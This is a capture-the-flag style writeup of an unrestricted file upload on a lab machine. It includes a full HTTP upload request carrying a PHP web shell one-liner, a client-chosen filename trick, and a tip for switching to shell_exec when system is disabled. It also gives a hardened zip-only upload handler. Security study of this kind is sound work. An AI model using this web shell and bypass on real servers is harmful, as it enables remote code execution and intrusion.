Unrestricted File Upload

As Paul, we have access to a file upload service that is supposedly meant to accept only zip files.

File upload

From the source code, we can see that there are no upload restrictions at all (not even on file type or file name).

Moreover, the task field lets us control the file name the upload is stored under. Using Burp Suite, we can upload a PHP one-liner that gives remote code execution.

Upload malicious files

POST /portal/includes/fileController.php HTTP/1.1
Host: 10.10.10.228
Content-Length: 338
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php echo shell_exec($_GET['cmd']); ?>
------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="task"

nothing.php
------WebKitFormBoundaryHBZNum5szzVSddPn--
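The handler above accepts any content under any client-chosen name. As an added example (not the box's own fileController.php), here is how a handler that is really limited to zip archives would validate the upload and ignore the name supplied in the request; UPLOAD_DIR, MAX_BYTES and the function names are assumptions.

```php
<?php
// Added example of a hardened zip-only upload handler (not the box's code).
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';   // outside the web root (assumption)
const MAX_BYTES  = 10 * 1024 * 1024;     // size limit (assumption)

// Returns null when the upload is acceptable, otherwise a rejection reason.
function validateZipUpload(array $file): ?string
{
    // Trust nothing until PHP reports a clean upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload failed';
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        return 'file too large';
    }
    // The client filename is untrusted; only its extension is inspected.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if ($ext !== 'zip') {
        return 'only .zip is accepted';
    }
    // Content check independent of the client's Content-Type header:
    // a non-empty zip starts with the local file header signature PK\x03\x04,
    // so a PHP one-liner renamed to .zip is rejected here.
    $fh = fopen($file['tmp_name'], 'rb');
    $magic = $fh ? (string) fread($fh, 4) : '';
    if ($fh) {
        fclose($fh);
    }
    if ($magic !== "PK\x03\x04") {
        return 'not a zip archive';
    }
    return null;
}

// Stores a validated upload under a server-generated name and returns its path.
function storeUpload(array $file): string
{
    if (($reason = validateZipUpload($file)) !== null) {
        throw new RuntimeException($reason);
    }
    // The request's "task" field is never used as a path, so the client
    // cannot choose the extension or the directory of the stored file.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.zip';
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Typical use from the endpoint: storeUpload($_FILES['file']);
```

If command execution is meant to be blocked through php.ini's disable_functions, the list has to cover shell_exec, exec, passthru, popen and proc_open as well as system, since the writeup's payload simply switched to a function that was left enabled.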

Notes

While I first tried to use the PHP system command, there seems to be an error when performing the upload. I suspect that system is not allowed by the PHP configuration.

Changing to shell_exec solves the issue.